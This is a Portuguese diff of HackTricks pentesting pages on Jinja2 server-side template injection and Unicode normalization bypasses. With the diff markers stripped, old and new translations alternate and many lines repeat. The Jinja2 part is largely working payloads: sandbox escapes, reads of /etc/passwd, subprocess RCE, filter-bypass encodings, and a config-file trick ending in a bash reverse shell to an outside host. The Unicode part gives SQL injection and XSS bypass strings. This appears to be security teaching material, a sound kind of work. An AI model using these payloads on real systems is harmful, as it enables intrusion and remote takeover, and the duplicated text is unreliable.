Este modelo de servidor usa a classe `file` para ler o arquivo `/etc/passwd` no servidor e exibi-lo na página da web.
#### **Prevenção**
Para evitar a vulnerabilidade SSTI, é importante validar adequadamente todos os modelos de servidor fornecidos pelo usuário. Isso pode ser feito usando uma biblioteca de modelo segura, como o MarkupSafe, que é usado pelo Jinja2.
Além disso, é importante limitar o acesso do usuário a informações confidenciais, como chaves secretas e senhas. Isso pode ser feito usando um modelo de servidor separado para exibir informações confidenciais e limitando o acesso a esse modelo de servidor apenas a usuários autorizados.
</details>
## **Laboratório**
```python
from flask import Flask, request, render_template_string
@ -93,21 +22,19 @@ app = Flask(__name__)
@app.route("/")
def home():
if request.args.get('c'):
return render_template_string(request.args.get('c'))
else:
return "Hello, send someting inside the param 'c'!"
if request.args.get('c'):
return render_template_string(request.args.get('c'))
else:
return "Hello, send someting inside the param 'c'!"
if __name__ == "__main__":
app.run()
app.run()
```
## **Diversos**
### **Misc**
#### **Declaração de Depuração**
Se a Extensão de Depuração estiver habilitada, uma tag `debug` estará disponível para despejar o contexto atual, bem como os filtros e testes disponíveis. Isso é útil para ver o que está disponível para uso no modelo sem configurar um depurador.
### **Declaração de Depuração**
Se a Extensão de Depuração estiver ativada, uma tag `debug` estará disponível para despejar o contexto atual, bem como os filtros e testes disponíveis. Isso é útil para ver o que está disponível para uso no template sem configurar um depurador.
```python
<pre>
@ -119,42 +46,32 @@ Se a Extensão de Depuração estiver habilitada, uma tag `debug` estará dispon
</pre>
```
#### **Despejar todas as variáveis de configuração**
Source: [https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement](https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement)
#### **Dump all config variables**
### **Despejar todas as variáveis de configuração**
```python
{{ config }} #In these object you can find all the configured env variables
{% raw %}
{% for key, value in config.items() %}
<dt>{{ key|e }}</dt>
<dd>{{ value|e }}</dd>
<dt>{{ key|e }}</dt>
<dd>{{ value|e }}</dd>
{% endfor %}
{% endraw %}
```
## **Injeção Jinja**
### **Injeção Jinja**
Primeiramente, em uma injeção Jinja, você precisa **encontrar uma maneira de escapar da sandbox** e recuperar o acesso ao fluxo de execução regular do python. Para fazer isso, você precisa **abusar de objetos** que são **do ambiente não-sandboxed mas acessíveis a partir da sandbox**.
Em primeiro lugar, em uma injeção Jinja, você precisa **encontrar uma maneira de escapar do sandbox** e recuperar o acesso ao fluxo de execução regular do Python. Para fazer isso, você precisa **abusar de objetos** que são **do ambiente não-sandboxado, mas são acessíveis a partir do sandbox**.
#### Acessando Objetos Globais
Por exemplo, no código `render_template("hello.html", username=username, email=email)` os objetos username e email **vêm do ambiente Python não-sandboxado** e serão **acessíveis** dentro do **ambiente sandbox**.\
\*\*\*\*Além disso, existem outros objetos que serão **sempre acessíveis a partir do ambiente sandbox**, estes são:
### Acessando Objetos Globais
Por exemplo, no código `render_template("hello.html", username=username, email=email)` os objetos username e email **vêm do ambiente python não-sandboxed** e serão **acessíveis** dentro do **ambiente sandboxed.**\
\*\*\*\*Além disso, existem outros objetos que serão **sempre acessíveis a partir do ambiente sandboxed**, estes são:
```
[]
''
@ -163,15 +80,13 @@ dict
config
request
```
### Recuperando \<class 'object'>
#### Recuperando \<class 'object'>
Então, a partir desses objetos, precisamos chegar à classe: **`<class 'object'>`** para tentar **recuperar** as **classes** definidas. Isso ocorre porque a partir deste objeto podemos chamar o método **`__subclasses__`** e **acessar todas as classes do ambiente python não-sandboxed**.
Em seguida, a partir desses objetos, precisamos chegar à classe: **`<class 'object'>`** para tentar **recuperar** as **classes** definidas. Isso ocorre porque a partir desse objeto podemos chamar o método **`__subclasses__`** e **acessar todas as classes do ambiente python não isolado**.
Para acessar essa **classe de objeto**, você precisa **acessar um objeto de classe** e, em seguida, acessar **`__base__`**, **`__mro__()[-1]`** ou `.`**`mro()[-1]`**. E então, **depois** de alcançar essa **classe de objeto**, **chamamos** **`__subclasses__()`**.
Verifique esses exemplos:
Para acessar essa **classe object**, você precisa **acessar um objeto de classe** e depois acessar **`__base__`**, **`__mro__()`[-1]** ou `.`**`mro()[-1]`**. E então, **após** alcançar essa **classe object**, nós **chamamos** **`__subclasses__()`**.
Confira estes exemplos:
```python
# To access a class object
[].__class__
@ -181,7 +96,7 @@ request["__class__"]
config.__class__
dict #It's already a class
# From a class to access the class "object".
# From a class to access the class "object".
## "dict" used as example from the previous list:
dict.__base__
dict["__base__"]
@ -211,30 +126,23 @@ dict.__mro__[-1]
# Not sure if this will work, but I saw it somewhere
{{ [].class.base.subclasses() }}
{{ ''.class.mro()[1].subclasses() }}
```
### Escapando RCE
#### Escapando do RCE
**Tendo recuperado** `<class 'object'>` e chamado `__subclasses__` agora podemos usar essas classes para ler e escrever arquivos e executar código.
Tendo recuperado `<class 'object'>` e chamado `__subclasses__`, agora podemos usar essas classes para ler e escrever arquivos e executar código.
A chamada para `__subclasses__` nos deu a oportunidade de acessar centenas de novas funções, ficaremos felizes apenas acessando a **classe de arquivo** para **ler/escrever arquivos** ou qualquer classe com acesso a uma classe que **permite executar comandos** (como `os`).
A chamada para `__subclasses__` nos deu a oportunidade de **acessar centenas de novas funções**, ficaremos satisfeitos apenas acessando a **classe de arquivo** para **ler/escrever arquivos** ou qualquer classe com acesso a uma classe que **permita executar comandos** (como `os`).
**Ler/Escrever arquivo remoto**
```python
# ''.__class__.__mro__[1].__subclasses__()[40] = File class
{{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }}
{{ ''.__class__.__mro__[1].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
```
**RCE (Execução Remota de Código)**
A Execução Remota de Código é uma vulnerabilidade que permite que um invasor execute comandos arbitrários em um sistema remoto. Isso pode ser feito explorando vulnerabilidades em aplicativos da web, servidores de banco de dados, sistemas operacionais e outros softwares. Quando um invasor explora com sucesso uma vulnerabilidade de RCE, ele pode executar comandos no sistema remoto como se estivesse fisicamente presente no sistema. Isso pode levar a uma série de consequências graves, incluindo o roubo de dados, a instalação de malware e o controle total do sistema remoto.
**RCE**
```python
# The class 396 is the class <class 'subprocess.Popen'>
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
@ -251,20 +159,18 @@ A Execução Remota de Código é uma vulnerabilidade que permite que um invasor
```
Para aprender sobre **mais classes** que você pode usar para **escapar**, você pode **verificar**:
{% content-ref url="../../generic-methodologies-and-resources/python/bypass-python-sandboxes/" %}
[bypass-python-sandboxes](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/)
{% endcontent-ref %}
#### Bypasses de filtro
### Bypasses de filtros
**Bypasses comuns**
#### Bypasses comuns
Esses bypasses nos permitirão **acessar** os **atributos** dos objetos **sem usar alguns caracteres**.\
Já vimos alguns desses bypasses nos exemplos anteriores, mas vamos resumi-los aqui:
```bash
# Without quotes, _, [, ]
## Basic ones
@ -293,48 +199,39 @@ http://localhost:5000/?c={{request|attr(request.args.getlist(request.args.l)|joi
```
* [**Retorne aqui para mais opções de acesso a um objeto global**](jinja2-ssti.md#accessing-global-objects)
* [**Retorne aqui para mais opções de acesso à classe do objeto**](jinja2-ssti.md#recovering-less-than-class-object-greater-than)
* [**Leia isto para obter RCE sem a classe do objeto**](jinja2-ssti.md#jinja-injection-without-less-than-class-object-greater-than)
* [**Volte aqui para mais opções de acesso a um objeto global**](jinja2-ssti.md#accessing-global-objects)
* [**Volte aqui para mais opções de acesso à classe de objeto**](jinja2-ssti.md#recovering-less-than-class-object-greater-than)
* [**Leia isso para obter RCE sem a classe de objeto**](jinja2-ssti.md#jinja-injection-without-less-than-class-object-greater-than)
**Evitando a codificação HTML**
Por padrão, o Flask codifica em HTML tudo o que está dentro de um modelo por motivos de segurança:
**Evitando codificação HTML**
Por padrão, o Flask codifica HTML de tudo dentro de um template por motivos de segurança:
```python
{{'<script>alert(1);</script>'}}
#will be
&lt;script&gt;alert(1);&lt;/script&gt;
```
O filtro `safe` nos permite injetar JavaScript e HTML na página **sem** que ele seja **codificado em HTML**, como neste exemplo:
**O filtro `safe`** permite injetar JavaScript e HTML na página **sem** que seja **codificado em HTML**, assim:
```python
{{'<script>alert(1);</script>'|safe}}
#will be
<script>alert(1);</script>
```
**RCE escrevendo um arquivo de configuração malicioso.**
**RCE através da escrita de um arquivo de configuração malicioso.**
```python
# evil config
{{ ''.__class__.__mro__[1].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}
{{ ''.__class__.__mro__[1].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}
# load the evil config
{{ config.from_pyfile('/tmp/evilconfig.cfg') }}
{{ config.from_pyfile('/tmp/evilconfig.cfg') }}
# connect to evil host
{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
```
### Sem vários caracteres
## Sem vários caracteres
Sem **`{{`** **`.`** **`[`** **`]`** **`}}`** **`_`**
```python
{% raw %}
{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}
@ -342,16 +239,13 @@ Sem **`{{`** **`.`** **`[`** **`]`** **`}}`** **`_`**
```
## Injeção Jinja sem **\<class 'object'>**
### Injeção Jinja sem **\<class 'object'>**
Dos [**objetos globais**](jinja2-ssti.md#accessing-global-objects), há outra maneira de obter **RCE sem usar essa classe.**\
Se você conseguir chegar a qualquer **função** desses objetos globais, poderá acessar **`__globals__.__builtins__`** e, a partir daí, o **RCE** é muito **simples**.
Você pode **encontrar funções** nos objetos **`request`**, **`config`** e em qualquer **outro** objeto **global** interessante ao qual você tenha acesso com:
A partir dos [**objetos globais**](jinja2-ssti.md#accessing-global-objects), existe outra maneira de chegar ao **RCE sem usar essa classe.**\
Se você conseguir acessar qualquer **função** desses objetos globais, será possível acessar **`__globals__.__builtins__`** e a partir daí o **RCE** é muito **simples**.
Você pode **encontrar funções** a partir dos objetos **`request`**, **`config`** e qualquer **outro objeto global** interessante ao qual você tenha acesso com:
```bash
{{ request.__class__.__dict__ }}
- application
@ -371,9 +265,7 @@ Você pode **encontrar funções** nos objetos **`request`**, **`config`** e em
# You can iterate through children objects to find more
```
Depois de encontrar algumas funções, você pode recuperar os builtins com:
Uma vez que você encontrou algumas funções, você pode recuperar os builtins com:
```python
# Read file
{{ request.__class__._load_form_data.__globals__.__builtins__.open("/etc/passwd").read() }}
@ -394,22 +286,23 @@ Depois de encontrar algumas funções, você pode recuperar os builtins com:
# All the bypasses seen in the previous sections are also valid
```
### Referências
## Referências
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
* Verifique o [truque de atributo para contornar caracteres na lista negra aqui](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/#python3).
* Verifique [attr trick para contornar caracteres na lista negra aqui](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/#python3).
* [https://twitter.com/SecGus/status/1198976764351066113](https://twitter.com/SecGus/status/1198976764351066113)
* [https://hackmd.io/@Chivato/HyWsJ31dI](https://hackmd.io/@Chivato/HyWsJ31dI)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking em AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

72
pentesting-web/unicode-injection/unicode-normalization.md
View file

@ -2,13 +2,15 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
@ -16,39 +18,39 @@
A normalização garante que duas strings que podem usar uma representação binária diferente para seus caracteres tenham o mesmo valor binário após a normalização.
Existem dois tipos gerais de equivalência entre caracteres, "Equivalência Canônica" e "Equivalência de Compatibilidade":\
Caracteres "Equivalente Canônico" são assumidos como tendo a mesma aparência e significado quando impressos ou exibidos. A "Equivalência de Compatibilidade" é uma equivalência mais fraca, na qual dois valores podem representar o mesmo caractere abstrato, mas podem ser exibidos de maneira diferente. Existem 4 algoritmos de normalização definidos pelo padrão Unicode; NFC, NFD, NFKD e NFKD, cada um aplica técnicas de normalização canônica e de compatibilidade de maneira diferente. Você pode ler mais sobre as diferentes técnicas em Unicode.org.
Existem dois tipos gerais de equivalência entre caracteres, “**Equivalência Canônica**” e “**Equivalência de Compatibilidade**”:\
Caracteres **Canonicamente Equivalentes** são considerados com a mesma aparência e significado quando impressos ou exibidos. **Equivalência de Compatibilidade** é uma equivalência mais fraca, na qual dois valores podem representar o mesmo caractere abstrato, mas podem ser exibidos de maneira diferente. Existem **4 algoritmos de Normalização** definidos pelo padrão **Unicode**; **NFC, NFD, NFKD e NFKD**, cada um aplica técnicas de normalização Canônica e de Compatibilidade de maneira diferente. Você pode ler mais sobre as diferentes técnicas em Unicode.org.
### Codificação Unicode
Embora o Unicode tenha sido em parte projetado para resolver problemas de interoperabilidade, a evolução do padrão, a necessidade de suportar sistemas legados e diferentes métodos de codificação ainda podem representar um desafio.\
Antes de mergulharmos nos ataques Unicode, os seguintes são os principais pontos a entender sobre o Unicode:
Embora o Unicode tenha sido projetado em parte para resolver problemas de interoperabilidade, a evolução do padrão, a necessidade de suportar sistemas legados e diferentes métodos de codificação ainda podem representar um desafio.\
Antes de explorarmos ataques Unicode, os seguintes são os principais pontos a entender sobre Unicode:
* Cada caractere ou símbolo é mapeado para um valor numérico que é referido como um "ponto de código".
* O valor do ponto de código (e, portanto, o próprio caractere) é representado por 1 ou mais bytes na memória. Caracteres LATIN-1 como os usados em países de língua inglesa podem ser representados usando 1 byte. Outros idiomas têm mais caracteres e precisam de mais bytes para representar todos os diferentes pontos de código (também porque não podem usar os já usados pelo LATIN-1).
* O termo "codificação" significa o método pelo qual os caracteres são representados como uma série de bytes. O padrão de codificação mais comum é o UTF-8, usando esse esquema de codificação, caracteres ASCII podem ser representados usando 1 byte ou até 4 bytes para outros caracteres.
* Quando um sistema processa dados, ele precisa saber a codificação usada para converter o fluxo de bytes em caracteres.
* Embora o UTF-8 seja o mais comum, existem padrões de codificação semelhantes chamados UTF-16 e UTF-32, a diferença entre cada um é o número de bytes usados para representar cada caractere. ou seja, UTF-16 usa um mínimo de 2 bytes (mas até 4) e UTF-32 usa 4 bytes para todos os caracteres.
* Cada caractere ou símbolo é mapeado para um valor numérico referido como “ponto de código”.
* O valor do ponto de código (e, portanto, o próprio caractere) é representado por 1 ou mais bytes na memória. Caracteres LATIN-1, como os usados em países de língua inglesa, podem ser representados usando 1 byte. Outras línguas têm mais caracteres e precisam de mais bytes para representar todos os diferentes pontos de código (também porque não podem usar os já ocupados pela LATIN-1).
* O termo “codificação” significa o método no qual os caracteres são representados como uma série de bytes. O padrão de codificação mais comum é UTF-8, usando esse esquema de codificação caracteres ASCII podem ser representados usando 1 byte ou até 4 bytes para outros caracteres.
* Quando um sistema processa dados, ele precisa saber a codificação usada para converter a sequência de bytes em caracteres.
* Embora UTF-8 seja o mais comum, existem padrões de codificação semelhantes chamados UTF-16 e UTF-32, a diferença entre cada um é o número de bytes usados para representar cada caractere. Por exemplo, UTF-16 usa um mínimo de 2 bytes (mas até 4) e UTF-32 usa 4 bytes para todos os caracteres.
Um exemplo de como o Unicode normaliza dois bytes diferentes que representam o mesmo caractere:
Um exemplo de como o Unicode normaliza dois bytes diferentes representando o mesmo caractere:
![](<../../.gitbook/assets/image (156).png>)
**Uma lista de caracteres Unicode equivalentes pode ser encontrada aqui:** [https://appcheck-ng.com/wp-content/uploads/unicode\_normalization.html](https://appcheck-ng.com/wp-content/uploads/unicode\_normalization.html) e [https://0xacb.com/normalization\_table](https://0xacb.com/normalization\_table)
### Descoberta
### Descobrindo
Se você encontrar em um aplicativo da web um valor que está sendo ecoado de volta, você pode tentar enviar **'KELVIN SIGN' (U+0212A)** que **normaliza para "K"** (você pode enviá-lo como `%e2%84%aa`). **Se um "K" for ecoado de volta**, então, algum tipo de **normalização Unicode** está sendo realizada.
Se você encontrar dentro de um webapp um valor que está sendo ecoado de volta, você poderia tentar enviar **SINAL DE KELVIN (U+0212A)** que **normaliza para "K"** (você pode enviá-lo como `%e2%84%aa`). **Se um "K" for ecoado de volta**, então, algum tipo de **normalização Unicode** está sendo executado.
Outro **exemplo**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` após a **normalização Unicode** é `Leonishan`.
Outro **exemplo**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` após **unicode** é `Leonishan`.
## **Exemplos vulneráveis**
## **Exemplos Vulneráveis**
### **Bypass de filtro de injeção SQL**
### **Bypass de filtro de Injeção SQL**
Imagine uma página da web que está usando o caractere `'` para criar consultas SQL com a entrada do usuário. Esta página da web, como medida de segurança, **deleta** todas as ocorrências do caractere **`'`** da entrada do usuário, mas **após essa exclusão** e **antes da criação** da consulta, ela **normaliza** usando **Unicode** a entrada do usuário.
Imagine uma página da web que está usando o caractere `'` para criar consultas SQL com a entrada do usuário. Esta web, como medida de segurança, **deleta** todas as ocorrências do caractere **`'`** da entrada do usuário, mas **após essa exclusão** e **antes da criação** da consulta, ela **normaliza** usando **Unicode** a entrada do usuário.
Então, um usuário mal-intencionado poderia inserir um caractere Unicode diferente equivalente a `' (0x27)` como `%ef%bc%87`, quando a entrada é normalizada, uma única aspa é criada e uma **vulnerabilidade de injeção SQL** aparece:
Então, um usuário malicioso poderia inserir um caractere Unicode diferente equivalente a `' (0x27)` como `%ef%bc%87`, quando a entrada é normalizada, uma aspa simples é criada e uma vulnerabilidade de **SQLInjection** aparece:
![](<../../.gitbook/assets/image (157) (1).png>)
@ -78,13 +80,13 @@ Então, um usuário mal-intencionado poderia inserir um caractere Unicode difere
" || 1==1//
%ef%bc%82+%ef%bd%9c%ef%bd%9c+%c2%b9%e2%81%bc%e2%81%bc%c2%b9%ef%bc%8f%ef%bc%8f
```
#### Modelo sqlmap
#### sqlmap template
{% embed url="https://github.com/carlospolop/sqlmap_to_unicode_template" %}
### XSS (Cross Site Scripting)
Você pode usar um dos seguintes caracteres para enganar o aplicativo da web e explorar um XSS:
Você pode usar um dos seguintes caracteres para enganar o webapp e explorar um XSS:
![](<../../.gitbook/assets/image (312) (1).png>)
@ -94,9 +96,9 @@ Observe que, por exemplo, o primeiro caractere Unicode proposto pode ser enviado
### Fuzzing Regexes
Quando o backend está **verificando a entrada do usuário com um regex**, pode ser possível que a **entrada** esteja sendo **normalizada** para o **regex** mas **não** para onde ele está sendo **usado**. Por exemplo, em um Open Redirect ou SSRF, o regex pode estar **normalizando o URL enviado** mas depois **acessando-o como está**.
Quando o backend está **verificando a entrada do usuário com uma regex**, pode ser possível que a **entrada** esteja sendo **normalizada** para a **regex**, mas **não** para onde está sendo **usada**. Por exemplo, em um Redirecionamento Aberto ou SSRF, a regex pode estar **normalizando a URL enviada** mas depois **acessando-a como está**.
A ferramenta [**recollapse**](https://github.com/0xacb/recollapse) permite **gerar variações da entrada** para fuzz o backend. Para mais informações, verifique o **github** e este [**post**](https://0xacb.com/2022/11/21/recollapse/).
A ferramenta [**recollapse**](https://github.com/0xacb/recollapse) permite **gerar variações da entrada** para fazer fuzzing no backend. Para mais informações, confira o **github** e este [**post**](https://0xacb.com/2022/11/21/recollapse/).
## Referências
@ -106,16 +108,18 @@ A ferramenta [**recollapse**](https://github.com/0xacb/recollapse) permite **ger
* [**https://labs.spotify.com/2013/06/18/creative-usernames/**](https://labs.spotify.com/2013/06/18/creative-usernames/)
* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)
* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass_WAF_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass_WAF_Unicode.html)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas dicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm).
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no github.
</details>

129
pentesting-web/web-vulnerabilities-methodology/README.md
View file

@ -2,56 +2,58 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
